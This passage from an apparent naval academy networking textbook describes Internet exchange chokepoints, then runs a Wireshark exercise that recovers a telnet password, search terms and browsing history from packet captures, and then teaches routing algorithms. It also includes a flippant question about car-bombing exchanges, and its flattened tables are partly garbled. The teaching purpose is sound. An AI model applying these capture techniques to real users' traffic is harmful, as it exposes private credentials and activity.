of the Internet's traffic is funneled. More examples: Almost all Internet traffic Between North and South America travels
through a building at address 50 N.E, Ninth Street, Miami, FL. You might be happy to know that in recent years the Internet
has moved back to the East coast! One of the main Internet focal points today is the Equinix campus in Ashburn Virginia near
Dulles Airport:
While it is true that the Internet of today is decentralized in terms of control (no one independent autonomous system is able to
control another independent autonomous system), it is decidedly not decentralized in terms of geography. There are, in fact,
many geographic choke points of great connectivity.
337
In summary, today there are approximately 42,000 autonomous systems (networks) connected together to form the Internet.
The locations where these autonomous systems are connected together (those beautiful buildings we have shown pictures of)
are termed Internet Exchanges. These Internet Exchanges allow networks to connect directly to each other. The street
addresses for these Internet Exchanges are readily accessible. See, for example, the Internet Exchange map published by
TeleGeography located here:
http://www.internetexchangemap.com/
Question 1: How many Internet exchanges are within 100 miles of Washington, D.C.?
Question 2: What is the address for the Internet Exchange located in Milwaukee?
Journalist Andrew Blum describes a visit he made to this building (the address you gave in your answer to Question 2) with a
colleague named Jon Auer in 2011:
A sleepy-eyed guard sat listlessly behind a worn-out desk in the empty lobby. Auer nodded in her direction and led
us down a narrow tiled passageway to the basement... Auer pointed to a steel box tucked into a dark corner, its LED
lights blinking away. This was the main access point for Milwaukee's municipal data network, connecting libraries,
schools and government offices. "All this talk about Homeland Security, but look what someone could do in here with
a chainsaw".
Question 3: There are 68 Internet exchanges in the United States. If you had a small terrorist army and wanted to
cripple the United States by obliterating it's Internet connectivity, how many well-placed car bombs would you need
(to the nearest 100)?
There must be some other reason why we showed you pictures of those pretty buildings, right?
Well, besides being critical security weak spots, these buildings became very popular locations for small NSA field offices
following the attacks on September 11, 2001. In his bestseller The Shadow Factory, James Bramford details how the NSA
went to these various Internet Exchanges in the United States, and installed taps at the main interconnections. In this way, the
NSA was able to monitor what amounted to, roughly, ALL Internet traffic.
Question 4: If you worked for the NSA and wanted to install taps on the Internet to monitor all Internet traffic, how
many locations would you need to visit (to the nearest hundred)?
The issues involving the invasion of privacy suffered by everyday Americans through the NSA's tapping of traffic at the Internet
Exchanges remains controversial to this day.
Part II: Your NSA Internship!
CONGRATULATIONS! You have been selected for a summer NSA internship! How exciting! You are now meeting your
new boss!
Well hello there! Welcome
aboard! I'm Eric. What is your
name?
I'm sorry… what did you say
your first name was?
Ok… welcome aboard,
Midshipman!
Your boss Eric tells you that the NSA suspects a midshipman living in Bancroft Hall (where else?) is allied with a terrorist
group. The midshipman's last name is Roy and the NSA has been tapping into his Internet traffic for some time through a tap
at MAE-East. You will be asked to analyze several captures of MIDN Roy's traffic using the Wireshark program. In fact, you
are given three tasks. Again, it is difficult to contain the excitement, and we again congratulate you.
Task 1: Capturing a password
Eric tells you that the first capture of MIDN Roy’s Internet traffic is located in the file telnetdata.pcap. The NSA
suspects that this packet capture contains MIDN Roy’s use of a Telnet session. Telnet is a networking protocol that provides
communication to a remote server. Many Telnet servers require the user to enter a username and password to access the service,
and the NSA is hoping you can extract MIDN Roy’s username and password from the file. The NSA suspects that MIDN Roy
is using the IP address 192.168.1.7.
338
Start up VMware Workstation and power-on your Cyber2 VM. Then launch Wireshark be selecting:
Applications > Internet > Wireshark (as root)
Under File, Click Open and highlight the file named telnetdata.pcap as shown below
And then hit Open.
Recall that MIDN Roy has the IP address 192.168.1.7. The very first packet (Packet 1) is a DNS request. Recall that DNS is
used to determine the IP address for a given URL. In other words, if we give DNS a website address such as www.foxnews.com
, DNS will tell us that the IP address is 23.15.7.144.
So, in the very first line of the capture (we will call this "packet 1" although, technically, this is not a packet…it's a packet
inside an Ethernet frame) we see that MIDN Roy is trying to find the IP address for a website. What website might this be?
Look in the Info field of Line 1 in the Packet List pane, and look at the Domain Name System Query information in the middle
pane (the Packet Details pane).
Question 5. What website is MIDN Roy attempting to find the IP address for?
Packet 2 is the DNS reply to the DNS request in packet 1.
Question 6. What is the IP address that corresponds to the website that MIDN Roy is accessing?
MIDN Roy is attempting to establish a telnet session with the server located at the IP address you provided in Question 6 above.
Let's focus on just the telnet packets by entering telnet in the filter field as shown below and then hitting Enter:
339
Now, we are attempting to determine the username and password that MIDN Roy entered in order to logon to the remote server.
So, we wish to concentrate only on the packets that have MIDN Roy’s IP address (192.168.1.7) as a source. Click the Source
field to order the packets by IP address:
You should now see this:
Notice the packets are no longer in sequence, the first packet listed is packet 7… this is the first TELNET packet send by MIDN
Ban.
340
To examine the Telnet data, concentrate on the middle pane (the Packet Details Pane) and click the arrow next to Telnet for the
first listed packet (which is packet number 7). You should see:
So, you notice that for the very first Telnet packet sent from MIDN Ban, he is telling the remote server to please echo back (Do
Echo) what he types, so that he sees it on his screen as he is typing. For information (although it does not apply to this particular
packet), \r is the escape sequence for carriage return back to the beginning of the same line and \r\n moves us to the
beginning of the next line. (Some Unix variants interpret \n as a line feed without a carriage return; hence we often will use
"Carriage Return Line Feed" as \r\n).
Examine the Telnet data for each of these packets.
Question 7: What username is MIDN Roy using?
Question 8: What password is MIDN Roy using?
So, you know the password that MIDN Roy uses for this one specific site. But…check out this recent short news item:
http://www.reuters.com/article/2014/08/05/us-cybercrime-breach-russia-idUSKBN0G52HS20140805
Question 9: What use might it be to know MIDN Roy’s password for this one specific site?
341
Task 2: Capturing a search term
Eric has just returned from the Bolshoi Ballet and he is very proud of your work in Task 1. He has now given you a second
packet capture obtained by snooping on MIDN Ban.
This second packet capture is located in the file
secondcapture.pcap.
In Wireshark, close the file you were working on, and open the file secondcapture.pcap. Clear the Filter if you see that
it is still set to telnet.
Question 10. How many packets are in this capture?
You are told: "Analyze this packet capture." What do you do? So many packets. So little time. You know from the prior
packet analysis that the user has IP address 192.168.1.7, so you hit the Source IP address field to order the packets by IP
address:
Question 11. Is MIDN Roy’s old IP address (192.168.1.7) listed?
You ask a fellow intern what to do, and he says that he heard that it is sometimes a good idea to see all the conversations that
have gone on in the packet capture.
Let's select Statistics => Conversation List => IPv4 as shown below:
342
Question 12. Is How many separate conversations are taking place in this packet capture?
So… which of these IP addresses correspond to MIDN Ban? To answer this, look at the third column that says Packets.
This lists how many packets have been sent between the two endpoints for that line. For example, in the picture below, we see
that 2 packets were sent between IP addresses 10.52.49.232 and 224.0.0.1.
So… if this is indeed a packet capture from MIDN Ban, then it stands to reason that MIDN Roy should have been doing the
most talking…i.e., sending or receiving the most packets.
So… focusing on the conversations that involved the most packets (the bottom of the list), we should be able to determine
MIDN Roy’s IP address.
Question 13. What would be your guess about MIDN Roy’s IP address?
Question 14. Given your answer above (MIDN Roy’s IP address), which IP address does MIDN Roy seem to be
communicating with the most?
Verify your answers to Questions 13 and 14 with your instructor or lab tech before proceeding!
So… who owns this IP address that MIDN Roy is communicating with? Glad you asked! IP addresses in North America and
Canada are assigned by the American Registry for Internet Numbers. Let's go to their website:
https://www.arin.net/
and, in the Search Whois box at the upper-right (see picture below for the location), enter the IP address that MIDN Roy is
communicating with (which was your answer to Question 14):
343
Question 15. Who owns this IP address?
Does this corporation sound familiar? Go to the Wikipedia page for Wikipedia (i.e., go to Wikipedia, and then enter the search
term "Wikipedia"). Review the summary shown on the right sidebar of the webpage.
Question 16. Who owns Wikipedia?
Question 17. To summarize, in this packet capture that you are examining, where is MIDN Roy spending most of his
time?
So, let's focus on the packets that are sent from MIDN Roy to this particular website. Let's click on the Destination header:
and then scroll down to the first packet that is from MIDN Roy to this IP address we are interested in.
You recall from SI110 that webpages are retrieved using the GET command. Let's focus just on the packets that are from
MIDN Ban, to the website of interest, that use the GET command (which, if used, will appear as the word GET in the Info
field.
Question 18. How many packets do you need to focus on—How many packets have MIDN Roy’s IP address as the
Source, have the target's IP address as the Destination, and have the word GET appearing as the first item in the Info
field?
Question 19. Okay, time to put all your cyber skills to use! What are the two terms that MIDN Roy searched for on
Wikipedia? Hint: Look for "search=" somewhere in the string following the word GET in the Info field.
344
Task 3: Capturing browsing history
Eric has just returned from lunch with the Russian ambassador and he is thrilled with the work you have done. He has given
you a third packet capture from MIDN Roy and has asked you to analyze the capture to determine the websites where MIDN
Roy has been spending his time.
You are given a packet capture named webtraffic.pcap. Your goal is to determine three distinct websites that MIDN
Roy has visited.
In Wireshark, close the file you were working on, and open the file webtraffic.pcap. Click on the No field (i.e., the
leftmost field) if necessary so that the first packet listed is Packet 1.
Question 20. What is the time duration of this packet capture?
Question 21. How many total packets were captured?
Select Statistics => Summary.
Question 22. How many total bytes are in this packet capture?
Question 23. On average, how many bytes per second were captured?
This is just a packet capture from one midshipmen!
Question 24. Let's say there are 1 billion people on line. If they generate traffic at approximately the same rate as
MIDN Ban, what is the total Internet traffic generated (in bytes) per second?
Question 25. Using this value, how many bytes of Internet traffic are generated per day?
Note that the printed collection of the U.S. Library of Congress is estimated to be
11013 bytes.
Question 26. If the NSA is vacuuming up all of the Internet's data, can the data actually be used… or is there simply
too much data for anyone, even the NSA, to make sense of?
Question 27. Looking at the TCP Conversations Statistics => Conversation List => IPv4 , guess
MIDN Roy’s IP address.
Verify your answer to Questions 27 with your instructor or lab tech before proceeding!
Since we want to determine the websites that MIDN Roy has visited, let's filter our display so that it shows only http packets
by entering http in the filter.
Now, click the Source header to group IP addresses together, and scroll down to where MIDN Roy’s packets start.
Now, here is what you need to do: You need to search through the GET packets to find the websites that MIDN Roy browses.
You might be saying: "AGHHH… that's a lot of GET commands"!
But… it's not so bad. Click on the very first GET packet from MIDN Ban. If you examine the GET info for this command
you will see:
345
We see that this host he is contacting is www.bbc.com! This provides a very good clue that one of the websites that MIDN
Roy is visiting is www.bbc.com. There, you have found one of the three websites MIDN Roy visited.
Now click the second and third GET packets. You should see that these are also from www.bbc.com.
Question 28. What are the other two sites that MIDN Roy visited in this packet capture? Note that the HTTP GET
/ HTTP/1.1 provides a good indication of an initial request to a website. Much of the traffic that follows are assorted
advertisements, tracking and monitoring sites, and related sites (e.g.: "Follow us on Facebook")
346
Security Exercise 14 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:
347
Question 16:
Question 17:
Question 18:
Question 19:
Question 20:
Question 21:
Question 22:
Question 23:
Question 24:
Question 25:
Question 26:
Question 27:
Question 28:
348
Chapter 15: Routing Part II
Objectives:
(a) Describe the fundamental algorithms used to construct routing tables.
(b) Describe how a routing table is developed using link state routing.
(c) Describe how a routing table is developed using distance vector routing.
(d) Identify the relative advantages and disadvantages of link state routing and distance vector routing.
In the previous lecture we used routing tables that already existed. Armed with the knowledge of how to use routing tables, in
this lecture we discuss where those routing tables actually come from (i.e., how they are derived). Up until this point we have
talked about simple examples where one router is the only path to one network. In reality, things are much different. Often
there can be multiple paths from one network to another. The question is not just how to get from Point A to Point B, but how
to get there using a good route.
I. What is a Good Route?
1. Routing Algorithms. A routing algorithm tells a router which outgoing line an incoming packet should be placed on. For
IP packets, the routing decision is made from scratch for each packet that arrives. A routing algorithm should endeavor to
satisfy the following attributes:
 Correctness—packets should be routed to the proper destination.
 Simplicity—algorithms should clean and simple so that packets are routed quickly to their destinations. Unwieldy
Rube Goldberg-type algorithms are to be avoided.
 Robustness—algorithms should adapt to changes in the network's topology caused by router or link failures.
 Stability—the algorithm should converge to a specific solution; packets should not be left aimlessly circulating in
loops around the network.
 Optimality—if there are multiple ways to get from Point A to Point B, the algorithm should provide the optimal path
through the network.
Routing is accomplished by routing protocols which establish routing tables in each router. The router consults its table to
determine how to route packets.
2. Networks as Graphs. To develop routing algorithms we model a computer network as a graph: the nodes of the graph are
the routers. An edge in a graph represents a communication link between two routers.
On each edge between two routers, we assign a weight. This weight might be distance, cost, queuing delay, or some other
factor of interest. Our problem: Find the path from a given source node to a destination node which minimizes the total weight.
If our weights represent:
then we are interested in:
distance
shortest path
cost
cheapest path
queuing delay
fastest path
3. Routing with Partial Information Routing is somewhat complicated by the fact that decisions are based on partial
information. But we encounter such situations every day. Consider driving down a road: Not every road sign lists every
destination. But, usually there is a default! (In road travel, the default is: If your destination is not listed on the sign, keep
driving straight.) When taken as a whole, routing tables (like road signs) must be consistent and complete. It is important that:
 all explicit directions correctly point to a shortest path
 all shortest paths for all destinations be explicitly noted in the tables
Note that routers make local routing decisions – i.e., they decide the next place to send a packet addressed to a specific
destination. But they must make this decision based on some understanding of the global network picture. So, each router
349
needs global information about the network. It is somewhat confusing, so the point bears repeating: Routers make local routing
decisions based on global information.
Recall that routing protocols establish routing tables in each router, and, as a simplification, we can say that these tables have the
following format:
Destination address
Address of the next element on the best path to the destination
When a packet shows up at a router, the router refers to the routing table to decide where to send the packet.
To get an idea of what a routing table should look like for a larger network than those we have treated up to this point, consider
the network shown below on the left. Suppose the weight of each link is one. The question is: What should the routing table
be for Router 1? The answer to this question is shown on the right.
8
7
Routing Table for Router 1:
1
3
destination
2
3
4
5
6
7
8
9
10
5
9
2
4
10
6
next hop
2
3
2
3
3
3
3
3
2
Practice Problem 15.1
Consider the network shown below, where the numbers on the edges indicate the cost of using that edge. For example, the cost
of using the link from Router A to Router B is 1, whereas the cost of using the link from Router A to Router D is 4.
(a) Fill in the routing table for Router A, and include the total cost.
B
C
3
1
2
A
1
4
4
1
D
E
Solution:
Destination
B
C
D
E
F
F
1
Next Hop
Total Cost
350
(b) If all routers have the correct routing tables, what is the path that an IP packet travels from Node A to Node F?
(Note that to state a path, you just need to state the sequence of routers encountered along the path; for example,
one possible path from Router A to Router F is A-D-E-F.
Solution:
(c) What is the total cost of the path you selected in Part (b) above?
Solution:
II. Routing Protocols
So, now that we know what routing tables should look like, we ask the question: How do routing tables actually get put
together? You likely solved the preceding example by looking down on the network and performing a visual analysis of the
picture. Routers do not have the ability to hover over a picture of the network, and they do not have human visual skills at their
disposal for use in analyzing a diagram.
Routers use routing protocols to build their routing tables. Routing protocols are intended to:
 Communicate network topology information to each router.
 Determine how individual routers will use this information to make routing decisions (i.e., determine how individual
routers will use this information to construct routing tables like the one shown above).
We will discuss two routing methodologies: Link State Routing and Distance Vector Routing.
1. Link State Routing
A. Two key ideas:
 Each router learns the full network topology. That is, each router learns a complete picture of the network graph–
the routers, the links and the link weights.
 Knowing the complete network picture, each router independently computes the optimal routes to each destination
and constructs a routing table.
B. Learning the topology.
The first bullet above says “routers learn the full network topology.” So, in link state routing, how do routers come
to know the network topology? Here's how:
 Each router learns its neighbors’ addresses by sending "Hello" packets to which its neighbors reply.
 Each router determines the weight of each of its links. For example, if these weights represent time delays, the
routers might determine how long it takes to receive a reply, and use that as the weight. If the weight is a cost,
the router might “know” the costs associated with each link based on data entered by a network administrator.
 Each router then transmits packets that tell information about that individual router's links.
For instance, in the picture below, Router 26 sends a packet that essentially says:
My name is Router 26
18
Router 18 is connected to me and the weight of the edge
joining us is 4
4
Router 35 is connected to me and the weight of the edge
joining us is 2
26
Router 51 is connected to me and the weight of the edge
joining us is 3
3
2
35
51
351
Or, somewhat more formally, it transmits a packet that conveys the following table.
26
Router
Weight
18
4
35
2
51
3
By sending this packet, a router informs the network about the status, or state, of each of its links. Hence, this
methodology is called Link State Routing and these packets are called Link State Packets (LSPs). This info will
then be used by others to construct routing tables.
These LSPs are distributed to all other routers using "controlled flooding": When a router receives a LSP, it gives it
to all of its neighbors. A router keeps track of which LSPs it has seen, and only floods them the first time they arrive.
Now…think about this: After each router has sent its LSP, and after each LSP has circulated to all the other routers,
then does each router have a full and complete picture of the network topology? The answer is Yes!
But what then—we still don't have routing tables in each router? The answer: Each router determines the shortest
path (i.e., the path with the lowest total weight) from itself to every other node in the network by running a famous
algorithm named "Dijkstra's Algorithm". This relatively easy algorithm is covered in any Discrete Math textbook, but
will not be covered in EC310. See the box below for more information about Dijkstra's Algorithm
It is important that the fundamental idea be understood: In link state routing:
 Each router, in its LSP, sends information about its neighbors only.
 The information in this LSP is sent to all other routers.
An
Aside
Do routers really have names like 'Router 26'? Yes! In the Internet's OSPF routing
protocol, a router identifies itself to all other routers using a unique IP address
called a Router ID. Additionally, in every OSPF message a router sends it will
include its Router ID so that other routers know who originated the message
and where they can be reached. For this reason it is very important that the IP
address assigned as the Router ID is always available.
As you know, hardware (like your trusty drill rifle) is prone to failure. Therefore, a special software interface called
the loopback interface is assigned the Router ID. The loopback interface, because it is enabled in software,
is always active regardless if one or two hardware interfaces on a router stop working. This ensures routers can always
find each other to communicate when needed.
What are the routers talking about with each other and why do they need to communicate so often? There are a
number of internal measures routers use in order increase efficiency and prevent unnecessary information from
clogging up the network, such as electing a Designated Router (DR) and Backup Designated Router (BDR) and
managing Link State Updates (LSU).
To learn more about OSPF, see http://www.ietf.org/rfc/rfc2328.txt.
352
An
Aside
Because of time constraints in EC310, we just say:
Each router runs Dijkstra’s Algorithm. This is a well-known algorithm
which solves this problem (the details of which we skip).
You should know, though, that the algorithm is truly one of the all-time-beauts in
network theory.
The algorithm solves the problem: Find the shortest path from Node X to every
other node in an arbitrary network where the edges have nonnegative weights associated with them. The algorithm is
not hard, but would require a full period (perhaps) to fully explain it. Many reasonably good explanations can be found
on the web.
Dijkstra's Algorithm has two interesting (non-technical) facts associated with it.
First, the algorithm was published in 1959. We realize that to the average midshipmen, the year 1959 might as well be
1659, but—truth be told—1959 is really not that long ago! It is fascinating to think that the basic problem of
determining the shortest path in a network eluded the great minds throughout history—Euclid, Euler, Newton, Leibniz,
Descartes, Fermat, Hilbert—not to be discovered until 1959.
Second, the algorithm was published in a journal article that was strikingly brief. The paper presenting this earthshattering result was slightly over two pages long. Just two pages! Next time your History prof tells you that your
paper needs to be 10 pages to say anything of value, reply: "WRONG! Haven't you heard of Dijkstra!"
Dijkstra had a number of interesting personal idiosyncrasies. Despite the fact that he invented the field of structured
computer programming and contributed a key concept (the semaphore) to the study of operating systems, he limited
his own use of computers. Until the time he retired from academe in 2000 he wrote all his papers by hand, used only
the chalkboard for teaching, and strictly limited his computer use to web browsing and email. He passed away in 2002
at age 72.
Practice Problem 15.2
Given the following network map with the weights of edges between routers:
(a) Construct the Link State Packet (LSP) that Router C would send to Router B.
Solution:
(b) After Router G runs Dijkstra's Algorithm, what would be the optimal route from router G to router B, and what
would be the total cost of this route?
Solution:
353
C. Topology changes. What if a link dies? For instance, in the picture on page 351 above, what if the link connecting
Router 18 to Router 26 should die?
In link state routing, whenever a router detects a change in the state of its links, it sends a new link state packet. Thus,
if the link connecting Router 18 to Router 26 should die, Router 26 will transmit a new LSP with the entries:
26
Weight
2
3
Router
35
51
Note that Router 18 will also detect the loss of a connection to Router 26 and transmit a new LSP as well. These new
LSP's will then propagate to all other routers via controlled flooding.
You might be wondering: Won't there now be conflicting information in the other routers? For instance, there will
now be two pieces of information from Router 26:

The old LSP from Router 26 that had info about the link to Router 18:
26
Weight
4
2
3
Router
18
35
51

and the revised LSP without info about router 18:
26
Weight
2
3
Router
35
51
Which of these should another router in the network choose to use to build its network picture and run Dijkstra's
Algorithm?
To solve this perplexing predicament, yielding a righteous resolution to this difficult dilemma, and thus causing
midshipmen merriment, each LSP has a sequence number. That is, a Router stamps its first LSP with sequence
number 1, its second LSP with sequence number 2, and so forth. Higher sequence numbers override lower sequence
numbers. So, when other routers in the network receive a new LSP from Router 26, they will notice that it has a
higher sequence number than the previous LSP, and they will delete the previous (outdated) LSP.
Okay…each router has to send LSPs when the router first is connected to the network, and also has to send LSPs
whenever the network topology changes. Are there any other times that routers send LSPs?
The answer is Yes! All routers also send LSPs periodically, just to make sure all routers are “on the same page.”
Where is link state routing used in the Internet? The Internet’s Open Shortest Path First (OSPF) protocol uses linkstate routing. (Open refers to the fact that the standard is “open,” i.e., published, non-propriety.)
2. Distance Vector Routing The other routing methodology is Distance Vector Routing (also variously called Bellman - Ford
Routing or Ford - Fulkerson Routing)
A. Basic Idea. Each router maintains a table:
Destination router




My guess of best distance
Which outgoing line
Each router learns its immediate (1-hop) neighbors and the distance to them.
Each router shares its knowledge about the entire network with its neighbors. This table is called a vector of distances,
or, a distance vector. These tables are exchanged with neighbors only.
When a router receives a distance vector from a neighbor, it uses that information to update its own distance vector.
Routers send distance vectors periodically, whether or not changes have occurred.
To consider how the distance vector algorithm works, let's consider the network shown below.
A
B
2
C
4
D
3
354
Initially, each of the four routers exchanges a Hello Packet with its neighbors, learning who their neighbors are, and the distance
to their neighbors. For example, Router B receives a Hello Packet from Router A and Router C, learning that these two routers
are a distance of 2 and 4 away, respectively. After this initial exchange, each of the four routers builds an initial routing table:
A
B
2
B 2
C
D
4
A 2
C 4
3
B 4
D 3
C
3
Now, every router shares its table with its neighbors.
Consider this exchange from Router A's perspective. Router A receives from Router B the distance vector shown above.
Hey, Router A, I have an entry in my table for Router C.
Router C is a distance of 4 away from me.
A
B
2
C
D
4
3
Hey, Router A, you're a genius.
But, Router B, you are a distance of 2 away from me, so… Router C
must be a distance of 6 away from me!!!
So, Router A changes its routing table to:
A
B
2
C
D
4
3
B 2
C 6
Now, consider the matter from Router B's perspective. Router C tells Router B: "Router D is a distance of 3 away from me."
Router B then reasons: "Router C is a distance of 4 away from me, and Router D is a distance of 3 away from Router C, so
Router D must be a distance of 7 away from me." So, Router B changes its routing table to:
A
B
2
B 2
C 6
C
D
4
3
A 2
C 4
D 7
In a like manner, Router C and Router D change their routing tables based on the initial exchange. Thus, after the initial
exchange of packets is complete, the distance vectors are:
A
B
2
B 2
C 6
C
D
4
3
A 2
C 4
D 7
A 6
B 4
D 3
355
B 7
C 3
But… matters are not done yet! Now that routers have reconstituted their distance vectors, they exchange them again! Note
that distance vectors are exchanged with neighbors only. So, Router B tells Router A: "Router D is 7 away from me." Router
A then reasons: "Router D must be 9 away from me." After all Routers reevaluate their distance vectors, we have this:
A
B
2
B 2
C 6
D 9
C
D
4
3
A 2
C 4
D 7
A 6
B 4
D 3
A 9
B 7
C 3
Hopefully this example convinces you that even though distance vectors are only exchanged with immediate neighbors,
information about the full network will eventually percolate to all routers.
But you are likely wondering: Okay… all the routers have distance vectors, but how do they use them for routing? To fill in
this last piece of the distance-vector puzzle, let's show a more complex example (taken from the Tanenbaum text).
B. Distance Vector Routing
Consider the network shown on the left below. Further, suppose that for this scenario the weights used in the network
represent time delays. Obviously, we would like data to be routed with minimal delay.
You are Router J. Notice that you have four neighbors: A, I, H and K. Your delay to A is 8, your delay to I is 10,
your delay to H is 12 and your delay to K is 6. You receive the distance vectors shown below on the right (the first
column is the received distance vector from Router A, the second is from Router I, the third from Router H and the
last column is the received distance vector from Router K.
Your goal: Write down your new estimates of distances to all nodes, and annotate your distance vector showing the next router
on the best path to each destination.
From, Tanenbaum, Computer Networks, 3rd ed
To see how you would accomplish this, let's focus on how you (Router J) would determine the best way to route a packet to
Router F.
 Your neighbor Router A is 8 away from you. Router A says to you: "I can get to F in 23" Thus, if you use Router A
as your next hop to Router F, you will get to Router F with a delay of 31.
 Your neighbor Router I is 10 away from you. Router I says to you: "I can get to F in 20" Thus, if you use Router I
as your next hop to Router F, you will get to Router F with a delay of 30.
 Your neighbor Router H is 12 away from you. Router H says to you: "I can get to F in 19" Thus, if you use Router
H as your next hop to Router F, you will get to Router F with a delay of 31.
 Your neighbor Router K is 6 away from you. Router K says to you: "I can get to F in 40" Thus, if you use Router K
as your next hop to Router F, you will get to Router F with a delay of 46.
356
Comparing these four values, you (Router J) conclude that the best way to route a packet to Router F is to send it to Router I.
The total delay from Router J to Router F will be 30.
Practice Problem 15.3
You are Router J. Notice that you have four neighbors: A, I, H and K. Your delay to A is 8, your delay to I is 10, your delay
to H is 12 and your delay to K is 6. 25You receive the distance vectors shown below on the right (the first column is the received
distance vector from Router A, the second is from Router I, the third from Router H and the last column is the received distance
vector from Router K.
Write down your new estimates of distances to all nodes, and annotate your distance vector showing the next router on the best
path to each destination.
From, Tanenbaum, Computer Networks, 3rd ed
Solution:
25
Note that it is not necessary that the delay between two nodes be the same in each direction. So, for example, it is perfectly
valid for the delay from J to A to be 8, while the delay from A to J be a different value (e.g., 9).
357
Figure 22.17 Two-node instability
Figure
22.17
Two-node
instability
The “Count to Infinity” Problem
in Distance
Vector
Routing Consider
the three-node network shown below.
C.
Atop Node A and Node B, we show the entry in their routing table for Node X. Node X is a distance of 2 away from
Node A. Node X is a distance of 6 away from Node B. All is well.
Figure 22.17 Two-node instability
Then Node X dies. Node A does not receive a Hello packet and realizes Node X must have died. It adjusts its routing
table to show that Node X is unreachable (a distance of infinity away).
Then, something weird happens, and it has nothing to do with the fact that the At Hoc alert announcing the active
shooter drill ended at 1046 did not actually get promulgated until 1245. Rather, this happens: Router A receives a
distance vector from Router B saying "I can reach Router X in a distance of 6."
Then…what do you do as Router A? You know that Router B is a distance of 4 away from you… and he's saying that
he can Two-node
reach X in a distance
of 6… You update your routing table!
Figure 22.17
instability
Figure 22.17 Two-node instability
22.34
Then you share your distance vector with B, and she updates her routing entry for X:
22.34
This exchange continues back and forth, until the cows come home, or until the cows come home blue in the face, or
until the cows come home blue in the face on a cold day in hell.
22.34
Forouzan, Data Communications and Networking, McGraw Hill, 2007
How can we limit or mitigate this instability? One proposed solution is to set some finite number = ∞. If we set, for
example, 30 = ∞, then after seven distance vector exchanges in the example above, both Router A and Router B would
have concluded that Router X was unreachable.
Most distance vector routing uses a hop-count metric, which means that the weight on each edge is equal to one. To
avoid the count-to-infinity problem, many algorithms set 16 = ∞.
3. Routing Protocol Summary
22.34
22.34
Link State Routing:
o Each router does its own calculations (Dijkstra) independent of other routers.
o Convergence is better because calculations are local
o Better scalability
But...
o Uses flooding.
Distance Vector Routing:
o
o
But...
o
o
Is easy to implement
In a static environment, the algorithm will correctly compute shortest paths to all destinations.
In a dynamic environment route computations might not stabilize and/or might be incorrect
The algorithm does not scale well
358
Practice Problem 15.4
In the event that router G experienced a fatal power supply failure, which protocol would be best suited to recovering from this
failure and sharing correct routing information?
(a) Link State Routing
(b) Distance Vector Routing
(c) Both protocols are robust and would be unaffected by this anomaly.
Solution:
359
360
Problems
1.
Concerning routing algorithms:
(a) Compare how well link-state algorithms and distance vector algorithms respond in the event of a router failure.
(b) Suppose a network uses distance vector routing. What would happen if a router sent a distance vector with all
zeroes?
(c) Describe the “count-to-infinity” problem. (Use a picture is you find it helpful.)
(d) In distance vector routing, each router receives distance vectors from (choose one):
(i)
Every router in the network
(ii)
Its one-hop neighbors
(iii)
DHCP
(iv)
The table set up by the network administrator
(v)
Messages exchanged using ARP
2.
Consider the network shown below which uses distance vector routing. You are router C. You have just received
the following distance vectors:
From B:
A
B
C
D
E
F
From D:
4
0
8
13
7
2
A
B
C
D
E
F
From E:
17
11
6
0
8
10
A
B
C
D
E
F
8
6
2
10
0
4
Your distances to B, D and E are 7, 4 and 6, respectively. What is your new routing table (include the distance and
next hop for each destination)?
B
C
A
D
E
3.
F
Consider the network whose graph is shown below. Assume link-state routing is used.
361
(a)
(b)
(c)
(d)
4.
5.
6.
Which routers does Router C send LSPs to?
Sketch the LSP sent by Router C.
Show the correct routing table for Router C
Show the correct routing table for Router E
Determine the correct routing table for Router A in the figure below.
Fill in the blanks for the below statements that describe the two major categories of routing protocols.
(a).
In _____________________ routing, a router will tell its immediate neighbors what it knows about the entire
network.
(b).
In _____________________ routing, a router will tell the entire network what it knows about its immediate
neighbor (controlled flooding).
Complete the partial routing table for Router C for the destinations listed below.
362
Destination
Next element
Total cost
---
0
A
B
C
D
E
363
364
Security Exercise 15
Introduction
Let’s put to use the networking skills we have learned to date to better understand routing at the router.
1. Set-Up
Equipment required:
 Your issued Laptop.
o Turn off the wireless adapter.
o Connect the blue Ethernet cable at your desk to your issued laptop.
 A printed or electronic copy of this security exercise.
o If printed, separate the network diagram and answer sheet and have them ready to fill in.
 VMware Workstation
o Power on your Cyber2 VM, then click VM and Settings.
o
Select Network Adapter and ensure that Connected, Connected at power on, and Bridged: Connected
directly to the physical network, and Replicate physical network connection state are selected or checked,
then click OK.
o
Open a terminal in your Cyber2 VM and execute the command
sudo dhclient
Once it finishes, execute the command
ifconfig
Your screen should look similar to Figure 1 on page 366. Interface eth1 should be assigned an IP address
of 192.168.XX.1YY, where XX is your classroom number and YY is a number between 0 and 254. If
not, notify your instructor or lab technician.
365
Figure 1 – ifconfig executed after initial lab setup.
Part 1: Getting the Lay of the Land
2. Where Am I?
Locate EC310 MID on your network diagram. This is your Cyber2 VM which has just joined a virtual network in a virtual
world. You have an Ethernet card in your virtual machine called eth1 that has been assigned an IP address on the virtual
network.
 Identify a) your IP address and compute b) your network address and network mask in CIDR notation using the
information from ifconfig.
 Label parts a) and b) of your network diagram.
In order for your packets to leave this virtual network and venture out into the virtual world, your virtual machine must send
them to a Gateway Router. Router A is serving this purpose for the network you are connected to. To send your packets to
Router A and out into the world, you must know its IP address first.
 Execute the command
route –n


Identify the IP address of the Gateway Router. Look under the Gateway column of the Kernel’s IP routing table
(see Figure 1 for reference). Recall that address 0.0.0.0 is used to represent any IP address and is not the
Gateway Router’s address.
Label part c) of your network diagram.
3. Where Do I Go Next?
In this virtual world there is an important website located at http://www.usna.edu.
 Verify the website www.usna.edu exists by opening Firefox and navigating to the website address. Access Firefox
by selecting Applications, Internet, Firefox from the system toolbar at the top of your virtual machine (see the figure
at the top of the next page for reference).
366

Browse the website to see what information is available.
Question 1: Who maintains the website at www.usna.edu?
In order for your virtual machine to access this website it first must know the webserver’s IP address. Recall from SI110 that
the Domain Name System (DNS) provides a convenient way for us to remember a website’s name rather than a bunch of
numbers for an IP address. Both are interchangeable through a series of ‘phonebooks’ (DNS name servers) on the Internet
that perform lookups on our behalf. If you provide the phonebook (DNS name server) the name of the webserver you would
like to access, it will give you its IP address in response or vice versa as shown in the example in Figure 2 below.
Figure 2 – DNS query and response.
The query above was generated using a utility called dig to find the IP address for www.cynicalmids.tumblr.com. dig
allows you to query a DNS name server and resolve its IP address.
 Identify the IP address of the website www.usna.edu by executing the following command
dig

www.usna.edu
